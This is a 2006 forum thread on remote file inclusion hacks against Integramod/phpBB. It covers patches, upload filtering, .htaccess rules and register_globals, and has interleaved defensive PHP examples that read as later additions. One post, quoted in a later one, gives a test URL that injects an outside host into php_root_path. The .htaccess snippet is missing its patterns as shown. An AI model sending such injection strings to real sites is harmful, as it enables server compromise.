Recent Hacking Discussion (continued...)

This is where you'll find security related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

PostAuthor: Vadar » Tue Aug 29, 2006 2:59 pm

OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labelled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... hp?sid=xxx

PostAuthor: computerz » Tue Aug 29, 2006 3:31 pm

Vadar wrote:
OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).

While doing that I noticed something that looked strange to me. For the fix labelled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");

For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');

Is that right?

For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2

In the die function it should be double quotes.

PostAuthor: Michaelo » Tue Aug 29, 2006 3:33 pm

One of us is confused...

Before you can upload a file you either need ftp access or, as a member, you upload a file of allowed types (.gif, .png etc.). There is no other way for a hacker to put a file on a server, assuming they haven't hacked another site on the server, in which case they may be able to cross contaminate…

To hack a site first you need a way in; to accomplish this you need to find a vulnerable point and exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them access… Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases, simply used a remote script hack tool to do this…

I have examined the possibility of restricting upload directories to only accept certain files such as images or zips in an effort to counter the cross contamination problem… more later on this…

Mike
Kiss Portal Engine phpbbireland (status: Released)

PostAuthor: Michaelo » Tue Aug 29, 2006 3:36 pm

It can be single or double, they are both treated as strings... I hope!
Kiss Portal Engine phpbbireland (status: Released)

PostAuthor: computerz » Tue Aug 29, 2006 3:46 pm

Michaelo wrote:
One of us is confused...

Before you can upload a file you either need ftp access or, as a member, you upload a file of allowed types (.gif, .png etc.).

I was under the assumption that the scripts already contain this input validation. Then if not, you're saying that in addition to an avatar or a photogallery image, I can upload .pl, .tlc, .c etc? Because these are the files that I find in these directories. A filter for .pl, .tlc, .zip, .tgz, and .c would definitely be in order, because these are the file extensions the hackers are uploading.

Michaelo wrote:
There is no other way for a hacker to put a file on a server, assuming they haven't hacked another site on the server, in which case they may be able to cross contaminate…

I'm not sure about this. I've seen it where one can put fget(), wget, or fput() commands into the URI.. but since we have phpbb_security installed that should stop that, unless of course hackers have discovered a workaround.

Michaelo wrote:
To hack a site first you need a way in; to accomplish this you need to find a vulnerable point and exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them access… Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases, simply used a remote script hack tool to do this…

Agreed.

Michaelo wrote:
I have examined the possibility of restricting upload directories to only accept certain files such as images or zips in an effort to counter the cross contamination problem… more later on this…

Great! Can't wait to see what you have.
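The upload filter discussed in the exchange above, written out as an added example; this is not Integramod, phpBB or Photogallery code. It assumes PHP 7 or later, and the names validate_image_upload, safe_storage_name, the form field "image" and $upload_dir are hypothetical. It goes a step further than the .pl/.c/.tgz blacklist proposed above: it accepts only a few image extensions, refuses names with more than one extension, and checks that the bytes actually decode as the image type the name claims.

```php
<?php
// Added example, not Integramod/phpBB code. Whitelist-based acceptance
// test for user uploads such as avatars or gallery images.
// All names here are hypothetical.

/**
 * Returns null if the upload may be stored in a web-served upload
 * directory, otherwise a short reason for rejecting it.
 *
 * @param string $original_name  client-supplied filename (untrusted)
 * @param string $tmp_path       where PHP placed the uploaded bytes
 */
function validate_image_upload(string $original_name, string $tmp_path): ?string
{
    // Only these extensions are accepted. Everything else (.pl, .c, .php,
    // .tgz, ...) is refused no matter what the client claims.
    $allowed = [
        'gif'  => IMAGETYPE_GIF,
        'jpg'  => IMAGETYPE_JPEG,
        'jpeg' => IMAGETYPE_JPEG,
        'png'  => IMAGETYPE_PNG,
    ];

    // The data must really come from this request's upload, not from
    // some other path on disk.
    if (!is_uploaded_file($tmp_path)) {
        return 'not an uploaded file';
    }

    // Drop any directory part the client may have sent ("../x.gif").
    $base  = basename($original_name);
    $parts = explode('.', $base);

    if (count($parts) < 2 || $parts[0] === '') {
        return 'missing file name or extension';
    }
    // Refuse names with more than one extension ("image.php.gif"):
    // some server configurations hand such files to an interpreter.
    if (count($parts) > 2) {
        return 'multiple extensions are not allowed';
    }

    $ext = strtolower($parts[1]);
    if (!isset($allowed[$ext])) {
        return "extension .$ext is not allowed";
    }

    // Check content, not just the name: the bytes must decode as the
    // image type the extension claims.
    $info = @getimagesize($tmp_path);
    if ($info === false || $info[2] !== $allowed[$ext]) {
        return 'file content does not match its extension';
    }
    return null;
}

/**
 * Storage name that never reuses the client-supplied name, so the name
 * on disk is always <random hex>.<whitelisted extension>.
 */
function safe_storage_name(string $original_name): string
{
    $ext = strtolower(pathinfo(basename($original_name), PATHINFO_EXTENSION));
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Usage in an upload handler (form field "image" and $upload_dir are
// hypothetical):
//
// $f   = $_FILES['image'];
// $err = validate_image_upload($f['name'], $f['tmp_name']);
// if ($err !== null) {
//     die('Upload rejected: ' . htmlspecialchars($err));
// }
// move_uploaded_file($f['tmp_name'], $upload_dir . '/' . safe_storage_name($f['name']));
```

getimagesize() only proves the header parses, so this check is best paired with a per-directory web server rule of the kind Michaelo suggests below, so that even a file that slips through is served as data and never handed to an interpreter.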

PostAuthor: Michaelo » Tue Aug 29, 2006 3:54 pm

computerz, you as admin determine what can be uploaded; it's in the ACP, 'allow upload file type' or something like that.

If you have any other file/script it is a result of hacking...
You cannot send any type of command via the address...

Play around with this little htaccess info and see how it goes...
Code:
    <Directory>
        # Allow access to the root of the hosting folder
        Options None
        AllowOverride None
        Order allow,deny
        Allow from all
        <FilesMatch>
            # But only to files with the specified extensions
            Order allow,deny
            Deny from all
        </FilesMatch>
        <FilesMatch>
            Order allow,deny
            Allow from all
        </FilesMatch>
    </Directory>

The root is your forum root... If you get it working, place it in all upload directories...
Mike
Kiss Portal Engine phpbbireland (status: Released)

PostAuthor: Solomon » Tue Aug 29, 2006 3:59 pm

The "other site" claims phpBB_security 1.0.3 will not stop the recent hacks but that CrackerTracker will. I have no clue, this is why I am asking. This has nothing to do with Michaelo's fixes.

PostAuthor: computerz » Tue Aug 29, 2006 4:07 pm

Michaelo wrote:
computerz, you as admin determine what can be uploaded; it's in the ACP, 'allow upload file type' or something like that.

Ahhhh.. I forgot about that, but isn't that only for the attachment control panel for the forums? In other words, do those restrictions also apply to the smartor Photogallery and the avatar image uploads?

Michaelo wrote:
You cannot send any type of command via the address...

That's good to know.

Michaelo wrote:
Play around with this little htaccess info and see how it goes...

Will most certainly!

And if we succeed with this, I'll be the first to throw in a nice donation for your hard work!

PostAuthor: Vadar » Tue Aug 29, 2006 4:29 pm

Just an update....

I'm seeing the same problem as in the ACP - Photo Album (Hacking attempt... Details Logged) in the ACP - Extensions block. Neither problem is a result of a hack, but rather the file modifications made as per Rev 5.

PostAuthor: angisson » Tue Aug 29, 2006 4:35 pm

Yeah, I put the patches on my site.. and now my chat system (the chat script from the 5 dollar script place, lol)

As long as my site is safe I can live without the chat, but I am wondering how I would fix it?

PostAuthor: ihammo » Wed Aug 30, 2006 4:39 am

Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, I popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html into a browser and I did not get a "hacking attempt" message.

Has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely.

PostAuthor: ihammo » Wed Aug 30, 2006 6:36 am

Ok, I think I have worked it out. My provider has switched Register_Globals to OFF (without telling me!)

To test I replicated my site on a server at home and set Register_Globals to ON. With this the hacking code worked when trying the hack.

Then I set it to OFF and the hacking code didn't work, but the phpbb_root_path variable attempting to be passed in the URL was nowhere to be seen (I added code to display it in both circumstances).

So, with Register_Globals off is the functions.php exploit at all possible? I am guessing (hoping) not!

Thanks everyone!
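What ihammo observed, put into code: with register_globals on, every request parameter becomes a PHP variable, so an include file that uses $phpbb_root_path without first assigning it will include whatever the query string names. The snippet below is an added example, not phpBB or Integramod code; it assumes PHP 7 or later and the function names are hypothetical. It shows how to check the setting from a script (complementing the phpinfo() page and the php_value register_globals 0 .htaccess line used later in this thread), a test that a root path value is a local directory rather than a stream URL, and the entry-script constant guard behind the "Hacking attempt" message, which works the same whether that string is written with single or double quotes.

```php
<?php
// Added example, not phpBB/Integramod code. Function names are hypothetical.

/**
 * True when register_globals is on for the running script. The directive
 * was removed in PHP 5.4, so on current PHP ini_get() returns false and
 * this reports "off"; on legacy PHP it reflects php.ini or .htaccess.
 */
function register_globals_enabled(): bool
{
    $value = ini_get('register_globals');
    return $value !== false && filter_var($value, FILTER_VALIDATE_BOOLEAN);
}

/**
 * A root path used as an include() prefix must be a local directory.
 * Reject stream-wrapper URLs (http://, ftp://, php://, data: ...) and
 * NUL bytes; accept ordinary relative or absolute paths.
 */
function root_path_is_local(string $root_path): bool
{
    if (strpos($root_path, "\0") !== false) {
        return false;
    }
    // "scheme:" of two or more characters is a wrapper, not a directory.
    // A single letter such as "C:/" is a Windows drive and stays allowed.
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $root_path)) {
        return false;
    }
    return true;
}

/**
 * Guard placed at the top of every include-only file: the real entry
 * scripts define IN_PHPBB before including anything, so a direct request
 * to the include file stops here. 'Hacking attempt' and "Hacking attempt"
 * are the same string to PHP; the quote style does not matter.
 */
function require_entry_script_context(): void
{
    if (!defined('IN_PHPBB')) {
        die('Hacking attempt');
    }
}

// How an entry script would use this (illustrative):
//
//   define('IN_PHPBB', true);
//   $phpbb_root_path = './';   // assigned here, never taken from the request
//   if (!root_path_is_local($phpbb_root_path)) {
//       die('Hacking attempt');
//   }
//   include($phpbb_root_path . 'includes/functions.php');
//
// and the first statement of an include-only file such as
// includes/functions.php, in its inline form:
//
//   if (!defined('IN_PHPBB')) { die('Hacking attempt'); }
```

This matches the two results reported above: with register_globals on, the request parameter does reach the include file and the guard is what stops it (the "Hacking attempt. Details Logged" message); with it off, the parameter never becomes a variable, so the include falls through with the "failed to open stream" warnings Solomon saw. Turning register_globals off removes the injection route, and the guard plus an explicitly assigned root path keep the file safe even where the setting cannot be controlled.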


PostAuthor: Solomon » Wed Aug 30, 2006 7:49 am

ihammo wrote:
Now I am confused

I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.

So, I popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html into a browser and I did not get a "hacking attempt" message.

Has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely.

I get the same result with Register_Globals ON or OFF:

Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/XXXXX/public_html/forum/includes/functions.php on line 38

Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXX/public_html/forum/includes/functions.php on line 38

Is this what I should get?

PostAuthor: ihammo » Wed Aug 30, 2006 9:09 am

When Register_Globals was OFF I got the exact same response as you, Solomon.

I added some extra code to the hacking code to display the root path that was being used, and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL.

I take it you do have direct control over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code
Code:
    <?php phpinfo(); ?>

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache])

PostAuthor: Solomon » Wed Aug 30, 2006 9:28 am

ihammo wrote:
When Register_Globals was OFF I got the exact same response as you, Solomon.

I added some extra code to the hacking code to display the root path that was being used, and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.

However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL.

I take it you do have direct control over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code
Code:
    <?php phpinfo(); ?>

which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache])

I'm toggling it via my .htaccess file and then verifying it in the ACP/Tool and/or ACP/Security section. Local toggles ON & OFF accordingly, and Master always stays ON because this is my host's shared server default.

.htaccess file string for servers where Master is default ON:

Local OFF desired
Code:
    php_value register_globals 0